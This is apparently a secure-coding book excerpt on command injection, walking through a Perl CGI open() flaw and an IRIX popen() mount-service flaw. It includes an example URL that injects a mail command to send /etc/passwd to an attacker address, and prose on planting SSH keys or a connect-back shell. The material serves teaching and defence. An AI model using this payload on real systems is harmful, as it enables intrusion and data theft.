Example Sins

CAN-2001-1187

The CSVForm Perl Common Gateway Interface (CGI) script adds records to a comma- separated value (CSV) database file. OmniHTTPd 2.07 web server ships with a script called statsconfig.pl. After the query is parsed, the filename (passed in the file parameter) gets passed to the following code:

 sub modify_CSV { if(open(CSV,$_[0])){   } 

Theres no input validation done on the filename, either. So you can use the cruel trick of adding a pipe to the end of the filename.

An example exploit would consist of visiting the following URL:

 http://www.example.com/cgi-bin/csvform.pl?file=mail%20attacker@attacker.org</etc/passwd 

On a UNIX system, this will e-mail the system password file to an attacker.

Note that the %20 is a URL-encoded space. The decoding gets done before the CGI script gets passed its data.

The example exploit we give isnt all that interesting these days, because the UNIX password file only gives usernames. Attackers will probably decide to do something instead that will allow them to log in, such as write a public key to ~ /.ssh/authorized_keys . Or, attackers can actually use this to both upload and run any program they want by writing bytes to a file. Since Perl is obviously already installed on any box running this, an obvious thing to do would be to write a simple Perl script to connect back to the attacker, and on connection, give the attacker a command shell.

CAN-2002-0652

The IRIX file system mounting service allows for remote file system mounting over RPC calls, and is generally installed by default. It turns out that, up until the bug was found in 2002, many of the file checks that the server needed to make when receiving a remote request were implemented by using popen() to run commands from the command line. The information used in that call was taken directly from the remote user , and a well-placed semicolon in the RPC parameter would allow the attacker to run shell commands as root on the box.